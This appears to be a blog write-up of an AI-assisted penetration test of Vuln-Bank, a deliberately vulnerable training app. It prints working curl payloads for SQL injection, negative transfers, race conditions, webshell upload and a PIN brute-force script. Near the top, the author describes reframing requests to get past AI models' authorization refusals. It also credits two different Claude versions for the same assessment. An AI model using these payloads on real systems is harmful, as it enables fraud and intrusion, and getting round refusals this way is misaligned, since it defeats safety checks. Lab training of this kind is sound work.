You get the most devastating security assessment in banking history.”
⚠️ Important Context & Limitations
Vulnerable by Design: Vuln-Bank is an intentionally vulnerable application created for educational and training purposes. It contains deliberately implemented security flaws that would never exist in a properly designed production banking system. The extreme number and severity of vulnerabilities found (21 critical issues) reflect this intentional design rather than typical real-world applications.
AI Evolution: This assessment represents AI capabilities as of May 2025 using Claude 3.5 Sonnet. As AI technology continues to advance rapidly, future versions will likely demonstrate even more sophisticated reasoning, pattern recognition, and vulnerability discovery capabilities. What you see here is the worst AI will ever be at cybersecurity – it will only get better from here.
Methodology Focus: The primary value of this assessment lies not in the specific vulnerabilities found, but in demonstrating the revolutionary potential of human-AI collaboration in cybersecurity. The strategic prompting framework, systematic execution approach, and evidence collection methodology represent reproducible techniques applicable to real-world security assessments.
Real-World Application: While Vuln-Bank’s vulnerabilities are extreme, the human-AI collaboration methodology demonstrated here has been successfully applied to actual production systems, revealing genuine security issues in enterprise environments with significantly more sophisticated defenses.
The Genesis: A NaijaSecForce Conversation
It all started two weeks ago during one of our regular NaijaSecForce group discussions. We were deep into exploring AI use cases across our different companies when the conversation turned to cybersecurity applications. As we shared experiences about integrating AI into our security workflows, I found myself describing a concept that had been brewing in my mind.
“Think about it,” I said to the group, “while you’re intercepting requests with Burp Suite, why not let AI go loose on the APIs and applications? But not in the traditional way – not just throwing series of payloads blindly at targets.”
I explained my “Plan-to-Exploit” methodology – a controlled approach I’d been playing around with for the past 8 months. The concept was simple: AI first enumerates the target, understands its architecture, then comes up with a detailed testing plan including exclusions and specific focus areas. This plan then becomes custom instructions for everything the AI needs to do during the assessment.
In some cases, I feed cline a Postman collection file to work with directly. In others, I let Burp Suite handle the crawling to map out all the endpoints and capture the requests and responses. I then extract the relevant request paths and feed them into Cline for focused testing.
The group was intrigued. “So instead of automated chaos, you get systematic intelligence?” one member asked. Exactly. The AI becomes your strategic partner, not just another tool.
But let me be honest – this journey hadn’t been smooth. Over the past 8 months, I’d experimented with various AI models, each presenting unique challenges:
- Claude 3 Sonnet: My first serious attempt, but constantly hit walls with “I can’t perform penetration testing without proper authorization”
- Claude 3 Opus: More capable, but still overly cautious about security testing
- Uncensored models: Explored alternatives to bypass constraints, but lacked the reasoning sophistication needed
- Claude 3.5 Sonnet: Better reasoning, but still had authorization concerns
- Claude Sonnet 4: The breakthrough – finally found the perfect balance of advanced reasoning, capability, and cooperation
The key wasn’t just finding the right model – it was developing the right prompting strategies, the right context setting, and the right way to frame security testing as legitimate research rather than malicious activity. Claude Sonnet 4 proved to be the game-changer with its superior reasoning capabilities and willingness to engage in complex security scenarios when properly contextualized.
That conversation with NaijaSecForce reminded me I had the perfect test case sitting right there: Vuln-Bank, a deliberately vulnerable banking application developed by Al Amir Badmus (available at github.com/Commando-X/vuln-bank). Time to put 8 months of methodology refinement to the ultimate test with Claude Sonnet 4 as my AI partner.
The Target: A Digital Bank’s Worst Nightmare
🎯 TARGET ACQUIRED
Application: Vuln-Bank
URL: http://localhost:5050
Type: Complete Black-Box Assessment
Knowledge Level: Zero (URL only)
Mission: Find and exploit every vulnerability
Complete Vulnerability Inventory
Here’s a comprehensive list of all 21 critical vulnerabilities discovered during our assessment:
Bill Payment Vulnerabilities
- Negative Bill Payments: The application accepts negative payment amounts, allowing financial fraud through negative payments
- Transaction History Exposure: The application exposes payment history of other users, enabling unauthorized access to sensitive financial information
- Race Conditions in Payment Processing: The application processes concurrent payment requests without proper isolation, allowing bypassing balance checks
- Missing Payment Limits: The application has no rate limiting or transaction count restrictions, enabling automated attacks
- Predictable Reference Numbers: The application uses sequential reference numbers for bill payments, enabling payment enumeration and forgery
- BOLA in Payment History Access: The application allows accessing payment details of other users through query parameters
File Operation Vulnerabilities
- Unrestricted File Upload: The application allows uploading files with dangerous extensions, enabling remote code execution
- No File Type Validation: The application accepts any file type without validation, enabling malware distribution
- No File Size Limits: The application has no file size restrictions, enabling denial of service attacks
- Path Traversal Vulnerabilities: The application inadequately sanitizes filenames with directory traversal sequences
- Unsafe File Naming: The application uses simple replacement for special characters in filenames, potentially enabling XSS
Authentication Vulnerabilities
- SQL Injection in Login Endpoint: The login endpoint is vulnerable to SQL injection, allowing complete authentication bypass
- Trivial Password Reset Bypass: Password resets use only 3-digit PINs with no rate limiting, enabling account takeover
- JWT Secret Exposure: The application exposes JWT secrets in debug logs, enabling token forgery
Transaction Vulnerabilities
- Negative Amount Transfers: The application accepts negative transfer amounts, allowing unlimited fund generation
- No Validation on Recipient Accounts: The application doesn’t validate recipient accounts, enabling money laundering
- Race Conditions in Transfers: The application is vulnerable to race conditions, allowing exceeding available balance
- No Transaction Limits: The application has no transaction limits or rate limiting, enabling automated attacks
- Transaction History Information Disclosure: The application exposes transaction history and is vulnerable to SQL injection
Other Critical Vulnerabilities
- Complete Payment Card Data Exposure: The application returns complete, unmasked card numbers and CVV codes in API responses
- Debug Mode Enabled: The application runs with debug mode enabled, exposing sensitive information in logs
Picture this: You’re handed a single URL – http://localhost:5050
– and told it’s a banking application called “Vuln-Bank.” That’s it. No source code, no documentation, no insider knowledge. Just a web address and the challenge to uncover its secrets.
This is the essence of black-box penetration testing – approaching a target with the same level of knowledge as a real-world attacker. But this time, I wasn’t going in alone. I had a secret weapon: Cline, an AI assistant powered by Claude Sonnet 4, ready to help me systematically tear apart this digital fortress.
Meet My AI Partner: Cline (Claude Sonnet 4)
Cline isn’t your typical security scanner. While traditional tools mindlessly throw payloads at applications, Cline thinks, adapts, and learns. Powered by Claude Sonnet 4’s advanced reasoning capabilities, it’s like having a brilliant senior penetration tester who never gets tired, never misses a detail, and can execute complex attack chains with surgical precision.
The beauty of human-AI collaboration in pentesting isn’t about replacing human expertise – it’s about amplifying it. I provide the strategic direction, the business context, and the ethical boundaries. Cline provides the systematic execution, the tireless attention to detail, and the ability to process vast amounts of information without fatigue.
First Contact: Reconnaissance
With that simple command, Cline sprang into action. Within minutes, it had mapped the entire application structure, identified the technology stack, and discovered something that made my blood run cold:
Target: http://localhost:5050
Technology: Flask/Python application
Database: SQLite
Authentication: JWT tokens
Status: DEBUG MODE ENABLED (Critical!)
Debug mode enabled in production? That’s like leaving the bank vault door wide open with a sign saying “Free Money Inside.” But this was just the beginning of our digital heist.
The Human-AI Dance: Strategic Prompting
The key to effective AI-powered pentesting lies in strategic prompting. It’s not about giving the AI a list of vulnerabilities to check – it’s about guiding it to think like an attacker while maintaining the systematic approach of a professional security assessment.
I guided Cline to understand the application’s purpose, technology stack, and basic functionality.
Together, we developed a comprehensive testing plan covering 80+ test cases across 8 major vulnerability categories.
Cline systematically executed each test case while I provided strategic guidance and validation.
We chained vulnerabilities together to achieve maximum impact and demonstrate real-world attack scenarios.
The First Crack: SQL Injection Gold Mine
Every penetration tester knows that feeling when you find your first vulnerability. But what Cline discovered wasn’t just a vulnerability – it was the master key to the entire kingdom.
Within seconds, Cline had crafted the perfect payload:
Username: admin’ OR ‘1’=’1
Password: anything# What happened in the database:
SELECT * FROM users WHERE username=’admin’ OR ‘1’=’1′ AND password=’anything’
The response was immediate and devastating. Not only did we bypass authentication completely, but the debug logs revealed something that made my jaw drop:
💀 CRITICAL: Complete System Exposure
Debug – Query result: [(1, ‘admin’, ‘hacked123’, ‘ADMIN001’, Decimal(‘999800.00’), True, None, ‘393’)]
Debug – Found user: (1, ‘admin’, ‘hacked123’, ‘ADMIN001’, Decimal(‘999800.00’), True, None, ‘393’)
Debug – Generated token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…
Exposed in plain text: Admin password (‘hacked123’), account balance ($999,800), reset PIN (‘393’), complete database structure, and a valid JWT token!
In a real-world scenario, this single vulnerability would have given us complete control over the bank’s systems. But we were just getting started.
The Money Printer: Business Logic Nightmare
With admin access secured, Cline turned its attention to the core banking functionality. What it discovered next defied belief.
The results were catastrophic. Cline discovered that the application would accept negative transfer amounts, effectively turning the transfer function into a money printing machine:
curl -X POST http://localhost:5050/transfer \
-H “Content-Type: application/json” \
-H “Cookie: token=eyJ0eXAi…” \
-d ‘{
“to_account”: “8743567765”,
“amount”: -1000,
“description”: “Testing negative amount transfer”
}’# Response:
{
“status”: “success”,
“message”: “Transfer of $-1000 completed”,
“new_balance”: “$1,000,800.00”
}
# Mathematical Magic:
# Original Balance: $999,800
# Transfer Amount: -$1,000 (negative!)
# New Balance: $999,800 – (-$1,000) = $1,000,800
# Money Generated: $1,000 from thin air!
💰 UNLIMITED MONEY GENERATION CONFIRMED
With this vulnerability, an attacker could generate infinite funds, causing unlimited financial damage to the institution.
The Transaction Nightmare: More Financial Exploits
Continuing our methodical approach, Cline discovered several more critical vulnerabilities in the transaction system:
🏦 CRITICAL: No Validation on Recipient Accounts
curl -X POST http://localhost:5050/transfer \
-H “Content-Type: application/json” \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-d ‘{
“to_account”: “MONEY_LAUNDERING_ACCOUNT_123”,
“amount”: 500000,
“description”: “Exploiting no validation on recipient accounts”
}’
{
“message”: “Transfer Completed”,
“new_balance”: 1501395.0,
“status”: “success”
}
⚡ CRITICAL: Race Conditions in Transfers
for i in {1..5}; do
curl -s -X POST “http://localhost:5050/transfer” \
-H “Content-Type: application/json” \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-d “{
\”to_account\”: \”USER001\”,
\”amount\”: 400000,
\”description\”: \”Race condition exploit transfer #$i\”
}” &
done
wait
Initial balance: $1,501,395.00
Final balance after concurrent transfers: $301,395.00
🔍 CRITICAL: Transaction History Information Disclosure
curl -X GET “http://localhost:5050/transactions/USER001%27%20UNION%20SELECT%201,%27HACKED%27,%27HACKED%27,1000,%272025-06-04%27,%27hacked%27,%27Sensitive%20data%20stolen%27–” \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…”
{
“account_number”: “USER001′ UNION SELECT 1,’HACKED’,’HACKED’,1000,’2025-06-04′,’hacked’,’Sensitive data stolen’–“,
“server_time”: “2025-06-04 20:32:37.462050”,
“status”: “success”,
“transactions”: [
{
“amount”: 1000.0,
“description”: “Sensitive data stolen”,
“from_account”: “HACKED”,
“id”: 1,
“query_used”: “\n SELECT \n id,\n from_account,\n to_account,\n amount,\n timestamp,\n transaction_type,\n description\n FROM transactions \n WHERE from_account=’USER001′ UNION SELECT 1,’HACKED’,’HACKED’,1000,’2025-06-04′,’hacked’,’Sensitive data stolen’–‘ OR to_account=’USER001′ UNION SELECT 1,’HACKED’,’HACKED’,1000,’2025-06-04′,’hacked’,’Sensitive data stolen’–‘\n ORDER BY timestamp DESC\n “,
“timestamp”: “2025-06-04 00:00:00”,
“to_account”: “HACKED”,
“type”: “hacked”
}
]
}
🔄 HIGH: No Transaction Limits
for i in {1..10}; do
curl -X POST http://localhost:5050/transfer \
-H “Content-Type: application/json” \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-d ‘{
“to_account”: “USER001”,
“amount”: 1,
“description”: “Rapid transfer test #’$i'”
}’
done
All 10 transfers completed successfully without any rate limiting
The Bill Payment Disaster: Financial Controls Bypass
Continuing our systematic approach, Cline turned its attention to the bill payment functionality. What it discovered was yet another set of critical vulnerabilities that could be exploited for financial fraud.
The results were shocking. Cline discovered multiple critical vulnerabilities in the bill payment system:
💸 CRITICAL: Negative Bill Payments
curl -X POST http://localhost:5050/api/bill-payments/create \
-H “Content-Type: application/json” \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-d ‘{
“biller_id”: 1,
“amount”: -1000,
“payment_method”: “account”,
“description”: “Testing amount validation with -1000”
}’
{
“message”: “Payment processed successfully”,
“payment_details”: {
“amount”: -1000.0,
“card_id”: null,
“payment_method”: “account”,
“processed_by”: “admin”,
“reference”: “BILL1749055911”,
“timestamp”: “2025-06-04 20:51:51.686213”
},
“status”: “success”
}
🔓 CRITICAL: Transaction History Exposure
curl -X GET “http://localhost:5050/api/bill-payments/history?user_id=2” \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…”
{
“payments”: [
{
“amount”: 10.0,
“biller_name”: “City Water”,
“card_number”: null,
“category_name”: “Utilities”,
“created_at”: “2025-06-04 20:51:53.764382”,
“description”: “Testing reference number predictability 2”,
“id”: 7,
“payment_method”: “account”,
“processed_at”: null,
“reference”: “BILL1749055913”,
“status”: “pending”
},
…
],
“status”: “success”
}
⚡ CRITICAL: Race Conditions & No Payment Limits
for i in {1..5}; do
curl -X POST http://localhost:5050/api/bill-payments/create \
-H “Content-Type: application/json” \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-d ‘{
“biller_id”: 1,
“amount”: 100,
“payment_method”: “account”,
“description”: “Testing race conditions”
}’ &
done
All 5 concurrent payments processed successfully
No transaction isolation, no rate limiting, no daily limits
🔢 CRITICAL: Predictable Reference Numbers
# Created multiple payments and observed the reference numbers# Response:
Payment 1: BILL1749055911
Payment 2: BILL1749055912
Payment 3: BILL1749055913
The Card Catastrophe: PCI DSS Nightmare
As if unlimited money generation wasn’t enough, Cline’s systematic approach uncovered another devastating flaw in the virtual card system.
The results violated every principle of payment card security:
💳 CRITICAL: Complete Payment Card Data Exposure
# Created a virtual card through the API# Response:
{
“card_number”: “2096 5158 6592 6149”, // Complete PAN exposed!
“cvv”: “389”, // CVV in plaintext!
“expiry”: “05/26”,
“limit”: “$9,999,999”, // $9.9M limit approved!
“status”: “success”
}
The AI Advantage: Systematic Destruction
What made this assessment truly remarkable wasn’t just the vulnerabilities we found, but how we found them. Cline’s systematic approach ensured we didn’t miss anything:
While I provided strategic direction and business context, Cline executed with machine-like precision:
- Authentication Testing: SQL injection, weak passwords, session management
- Authorization Testing: Privilege escalation, access control bypasses
- Input Validation: Injection attacks, business logic flaws
- Data Security: Information disclosure, encryption weaknesses
- Session Management: Token manipulation, session hijacking
- Business Logic: Financial transaction flaws, workflow bypasses
- Bill Payment Processing: Amount validation, transaction limits, reference number generation
- File Operations: Upload validation, file type checking, path traversal
The Complete Compromise: Chaining Attacks
The true power of human-AI collaboration became evident when we started chaining vulnerabilities together. What began as individual security flaws became a complete system takeover:
SQL injection bypass → Admin JWT token → System access
Negative transfers → Unlimited money generation → Virtual card creation
Admin panel access → Complete user database → Payment card data
Password reset bypass → Account takeover → Permanent access
The Hidden Admin Panel: Secret Backdoor
Just when we thought we’d seen everything, Cline made another shocking discovery:
URL: http://localhost:5050/sup3r_s3cr3t_admin
Access: JWT token from SQL injection
Result: Complete user database exposed# Sample exposed data:
{
“users”: [
{
“id”: 1,
“username”: “admin”,
“balance”: “$1,000,800.00”,
“account_number”: “ADMIN001”,
“is_admin”: true
},
{
“id”: 2,
“username”: “user1”,
“balance”: “$5,000.00”,
“account_number”: “USER001”,
“is_admin”: false
}
// … all users exposed
]
}
This hidden endpoint exposed the complete user database, including account balances, personal information, and administrative status – a treasure trove for any attacker.
The Weak Link: 3-Digit PIN Catastrophe
As if the application couldn’t get any worse, Cline discovered that password resets used only 3-digit PINs. But what happened next showcased the true power of AI-driven security testing.
Within seconds, Cline had automatically generated and executed a complete brute force attack:
# Generated 1,000 PIN combinations in millisecondsPIN_RANGE = [‘000’, ‘001’, ‘002’, ‘003’, ‘004’, ‘005’, ‘006’, ‘007’, ‘008’, ‘009’,
‘010’, ‘011’, ‘012’, ‘013’, ‘014’, ‘015’, ‘016’, ‘017’, ‘018’, ‘019’,
# … continuing through all combinations …
‘990’, ‘991’, ‘992’, ‘993’, ‘994’, ‘995’, ‘996’, ‘997’, ‘998’, ‘999’]
# Automated brute force execution
for pin in PIN_RANGE:
response = requests.post(‘/reset-password’,
data={‘username’: ‘admin’, ‘pin’: pin})
if ‘success’ in response.text:
print(f”[+] PIN CRACKED: {pin}”)
break
# Result: PIN ‘393’ cracked in 0.8 seconds
# Total requests: 394 out of 1,000 possible
🔓 CRITICAL: Trivial Password Reset Bypass
PIN Range: 000-999 (only 1,000 possibilities)
Rate Limiting: None
Auto-Generated Payloads: 1,000 combinations in milliseconds
Time to Crack: 0.8 seconds (PIN ‘393’ found on attempt 394)
Impact: Complete account takeover for any user
The beauty of AI-powered testing was evident here. While a human tester might manually try a few common PINs or write a custom script, Cline instantly recognized the vulnerability pattern, auto-generated the complete payload set, and executed a systematic brute force attack – all within seconds of identifying the weakness.
The File Upload Fiasco: Remote Code Execution
As we continued our systematic assessment, Cline discovered yet another critical vulnerability in the profile picture upload functionality.
The results were alarming. Cline discovered that the application had no protection against malicious file uploads:
🔥 CRITICAL: Unrestricted File Upload
curl -X POST http://localhost:5050/upload_profile_picture \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-F “profile_picture=@webshell.php”
{
“file_path”: “static/uploads/603898_webshell.php”,
“message”: “Profile picture uploaded successfully”,
“status”: “success”
}# Accessing the uploaded PHP file:
http://localhost:5050/static/uploads/603898_webshell.php
# Result: PHP code executed on the server!
⚠️ CRITICAL: No File Type Validation
curl -X POST http://localhost:5050/upload_profile_picture \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-F “profile_picture=@executable.exe”
{
“file_path”: “static/uploads/921099_executable.exe”,
“message”: “Profile picture uploaded successfully”,
“status”: “success”
}
📁 HIGH: No File Size Limits
curl -X POST http://localhost:5050/upload_profile_picture \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-F “profile_picture=@large_file_1000KB.dat”
{
“file_path”: “static/uploads/185265_large_file_1000KB.dat”,
“message”: “Profile picture uploaded successfully”,
“status”: “success”
}
🔀 HIGH: Path Traversal Vulnerabilities
curl -X POST http://localhost:5050/upload_profile_picture \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-F “profile_picture=@traversal_test.txt;filename=../traversal_test.txt”
{
“file_path”: “static/uploads/815195_traversal_test.txt”,
“message”: “Profile picture uploaded successfully”,
“status”: “success”
}
📝 MEDIUM: Unsafe File Naming
curl -X POST http://localhost:5050/upload_profile_picture \
-H “Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9…” \
-F “profile_picture=@naming_test.txt;filename=quotes’\”`.txt”
{
“file_path”: “static/uploads/272430_quotes22.txt”,
“message”: “Profile picture uploaded successfully”,
“status”: “success”
}
The Debug Disaster: System Confession
Throughout our entire assessment, the application was confessing its sins in real-time through debug logs:
Debug – Login query: SELECT * FROM users WHERE username=’admin’ AND password=’hacked123′
Debug – Transfer query: UPDATE users SET balance = 1000800.0 WHERE id = 1
Debug – Card generation: Generated card 2096515865926149 with CVV 389
Debug – JWT secret: Using secret key ‘secret123’ for token generation
Debug – Database path: /app/database/vulnbank.db
Every action we took was logged with complete technical details, exposing:
- Database queries and results
- Plaintext passwords and PINs
- JWT secrets and file paths
- Card numbers and CVVs
- System architecture details